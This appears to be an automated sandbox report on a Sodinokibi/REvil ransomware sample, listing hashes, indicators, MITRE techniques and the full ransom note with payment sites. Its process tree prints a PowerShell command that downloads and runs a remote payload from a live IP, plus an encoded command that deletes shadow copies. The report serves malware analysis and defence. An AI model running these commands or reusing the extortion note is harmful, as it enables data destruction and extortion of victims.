sodinokibi | 14e3d246bf04730f371e94114788e30bb4a609324dd115e56411f6a5066b8ea1

General

Target

235620e528e879523640f19c8cb5ee8e.bat
Size

219B
MD5

3141305118100484c56608118b0125cd
SHA1

6130755f363b7419592d3f30e74854847acbde07
SHA256

14e3d246bf04730f371e94114788e30bb4a609324dd115e56411f6a5066b8ea1
SHA512

f81b732613a643ff65706bc9d3c06fdbd2bdd804661e7899c43f11298145a20a1bfd58c48067e0e218eb789c667ae2c62c278094c89599cd74687a01f758295f

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/235620e528e879523640f19c8cb5ee8e

Extracted

Path

C:\huj40pji59-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension huj40pji59. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E4C4D3882405CF52 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/E4C4D3882405CF52 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: QmLy8rxHwIRWW4jk5wOaLE7DkNe3zrz9ruMvbOVeb7f78Gqub92BzVro5i6xOZNo uIjnC5dp7XHl2q/5YFJNlve/5RS1beVbHMheShgXN0RljsJgHVCQUIfGRahTAH/s RnQizJjqugAwEfMgugm8g7EeULxiaQJopnr55ICALvB/HZQy/EjMzj7kEU2mlYAf KECuEGcehF6u4MuZ7RfbZS31DsVf+A4r0qBt8QAooj3rEPGykVAfRL5+38QEf3JK cUtRf2GIZnslgbW+jo5g0HLpIWNd9rz3+uI8Vgll8zF4KX2juXxok63kCOvxhhIL dvnUcSK9iovbAkOyPBc6cbcxLRJlIDql9nTVN3QabULtEsDNtfO0MIayOvfhnyCr h3xLdUV2lOUClJAlhVVNnVgt719INLaR5g1Fo85/EvhMrATN0Ry8/0mmPw9nESXt pyLz3IMmIb5FMX0Cr/G12O/953OgfLTZ/XSkqESkF5nEdEo6YLPNr06/+LeEIv/u QadgOxT9gJ0Ibwtru4HxWX2UgZI2pm5rY717MYe1KkMrKk0SGwhGZBxTxnpH85Zn 6kKYXXQYHHZHxGkuds3wYsZpbU0OKmOsweMPFPQbRjj2SXA+qYeFHTuQsmQn7gDj zH4NwAJwhn09uoOLmJjpfxWIuFjaxMd7ptCMa45NXpTYkaqd+sWZE90cjEif797T I5QSVe3vVKVoumSYYJtEHo9OoSeajoppK7h214cwD5xRqgPggfOks8O9WBrWQpjH dQ1oKyTrHPMJReWH+7aEEYUW/K9VrDjxyj2RqYT77lyS9xCLAwle7LQqIkzKAJZx HkaldttzYgNXmsyiqCu5ZbX1TrQJpnpUrqfwBRsbd7AMdZTANzG1QFUquieks/MV XOnud1q0wVx5MhXCJhSovD/RQ7S8/ycUqfDIAcnvqPychJd85G7Oy2JO83Okc28+ KncmR3b6ESS/peEhssOnBlw4KJ/9poF3EZPzAtzMgd2C3Wru26gTOFnUMzDvSuQC 7PbrsSKglIEhAqZX923X+XQsPGbb+Cs7TYkLDj2+V29eIFdKqFjRFrKXGQ6gsiye MJftyXiBcUjtcZ58veHV6efI1zqUUVkzzvgsmUhtGWTGukE/MMNSU8pDH67kbd9/ 5z4B6C+zPPehrLcJUg2I10TnnbY7RhfFAFfJE0dEh1hHB+VkiPFs7cUKVLIRq1Vo 2Z77zz4fbaY+n6KJecajc0fd1/w4Tpdvf9yW98k/qYYqQEtIEjjcaNcSdOjv6Qko FqkpIh3B0bWhNzQKwuMSEx7qI33HNQMO ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E4C4D3882405CF52

http://decryptor.cc/E4C4D3882405CF52

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Blacklisted process makes network request 57 IoCs

Processes:

powershell.exe

flow	pid	process
1	576	powershell.exe
3	576	powershell.exe
5	576	powershell.exe
9	576	powershell.exe
11	576	powershell.exe
16	576	powershell.exe
18	576	powershell.exe
20	576	powershell.exe
22	576	powershell.exe
30	576	powershell.exe
32	576	powershell.exe
34	576	powershell.exe
36	576	powershell.exe
38	576	powershell.exe
41	576	powershell.exe
43	576	powershell.exe
46	576	powershell.exe
48	576	powershell.exe
50	576	powershell.exe
52	576	powershell.exe
54	576	powershell.exe
56	576	powershell.exe
58	576	powershell.exe
60	576	powershell.exe
62	576	powershell.exe
64	576	powershell.exe
66	576	powershell.exe
67	576	powershell.exe
69	576	powershell.exe
71	576	powershell.exe
73	576	powershell.exe
75	576	powershell.exe
77	576	powershell.exe
79	576	powershell.exe
81	576	powershell.exe
83	576	powershell.exe
85	576	powershell.exe
87	576	powershell.exe
89	576	powershell.exe
91	576	powershell.exe
93	576	powershell.exe
95	576	powershell.exe
97	576	powershell.exe
99	576	powershell.exe
101	576	powershell.exe
103	576	powershell.exe
105	576	powershell.exe
107	576	powershell.exe
109	576	powershell.exe
111	576	powershell.exe
113	576	powershell.exe
115	576	powershell.exe
117	576	powershell.exe
119	576	powershell.exe
121	576	powershell.exe
123	576	powershell.exe
126	576	powershell.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\NewGrant.raw => \??\c:\users\admin\pictures\NewGrant.raw.huj40pji59	powershell.exe
File renamed	C:\Users\Admin\Pictures\OutSend.raw => \??\c:\users\admin\pictures\OutSend.raw.huj40pji59	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3emo6z2jao0f1.bmp"	powershell.exe

Drops file in Program Files directory 16 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\CompareExit.xltx	powershell.exe
File opened for modification	\??\c:\program files\PublishFind.xml	powershell.exe
File created	\??\c:\program files (x86)\huj40pji59-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\OutWatch.wav	powershell.exe
File opened for modification	\??\c:\program files\ResizeSelect.png	powershell.exe
File opened for modification	\??\c:\program files\RevokeImport.wma	powershell.exe
File opened for modification	\??\c:\program files\UseMove.jfif	powershell.exe
File opened for modification	\??\c:\program files\ConvertFromLimit.WTV	powershell.exe
File opened for modification	\??\c:\program files\SubmitStart.ADT	powershell.exe
File opened for modification	\??\c:\program files\ClearUnblock.rm	powershell.exe
File opened for modification	\??\c:\program files\MeasureGrant.mht	powershell.exe
File opened for modification	\??\c:\program files\ProtectStart.xml	powershell.exe
File opened for modification	\??\c:\program files\RedoBlock.html	powershell.exe
File opened for modification	\??\c:\program files\RestartInstall.rle	powershell.exe
File opened for modification	\??\c:\program files\SearchTrace.js	powershell.exe
File created	\??\c:\program files\huj40pji59-readme.txt	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe

pid	process
576	powershell.exe
576	powershell.exe
576	powershell.exe
576	powershell.exe
576	powershell.exe
1364	powershell.exe
1364	powershell.exe
1364	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeBackupPrivilege	2764	vssvc.exe
Token: SeRestorePrivilege	2764	vssvc.exe
Token: SeAuditPrivilege	2764	vssvc.exe
Token: SeTakeOwnershipPrivilege	576	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 2608 wrote to memory of 576	2608	cmd.exe	powershell.exe
PID 2608 wrote to memory of 576	2608	cmd.exe	powershell.exe
PID 2608 wrote to memory of 576	2608	cmd.exe	powershell.exe
PID 576 wrote to memory of 1364	576	powershell.exe	powershell.exe
PID 576 wrote to memory of 1364	576	powershell.exe	powershell.exe
PID 576 wrote to memory of 1364	576	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\235620e528e879523640f19c8cb5ee8e.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/235620e528e879523640f19c8cb5ee8e');Invoke-YXVVCLYNAQLV;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2764

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/576-0-0x0000000000000000-mapping.dmp

Download
memory/576-1-0x0000000074010000-0x00000000746FE000-memory.dmp

Filesize
6.9MB

Download
memory/576-2-0x0000000004360000-0x0000000004361000-memory.dmp

Filesize
4KB

Download
memory/576-3-0x0000000006D30000-0x0000000006D31000-memory.dmp

Filesize
4KB

Download
memory/576-4-0x0000000006C70000-0x0000000006C71000-memory.dmp

Filesize
4KB

Download
memory/576-5-0x0000000007450000-0x0000000007451000-memory.dmp

Filesize
4KB

Download
memory/576-6-0x00000000074C0000-0x00000000074C1000-memory.dmp

Filesize
4KB

Download
memory/576-7-0x0000000007710000-0x0000000007711000-memory.dmp

Filesize
4KB

Download
memory/576-8-0x00000000075A0000-0x00000000075A1000-memory.dmp

Filesize
4KB

Download
memory/576-9-0x0000000007F60000-0x0000000007F61000-memory.dmp

Filesize
4KB

Download
memory/576-10-0x0000000007E20000-0x0000000007E21000-memory.dmp

Filesize
4KB

Download
memory/576-11-0x0000000009580000-0x0000000009581000-memory.dmp

Filesize
4KB

Download
memory/576-12-0x0000000008B10000-0x0000000008B11000-memory.dmp

Filesize
4KB

Download
memory/1364-13-0x0000000000000000-mapping.dmp

Download
memory/1364-14-0x0000000074010000-0x00000000746FE000-memory.dmp

Filesize
6.9MB

Download
memory/1364-24-0x00000000092C0000-0x00000000092C1000-memory.dmp

Filesize
4KB

Download
memory/1364-26-0x0000000009220000-0x0000000009221000-memory.dmp

Filesize
4KB

Download
memory/1364-27-0x00000000098F0000-0x00000000098F1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads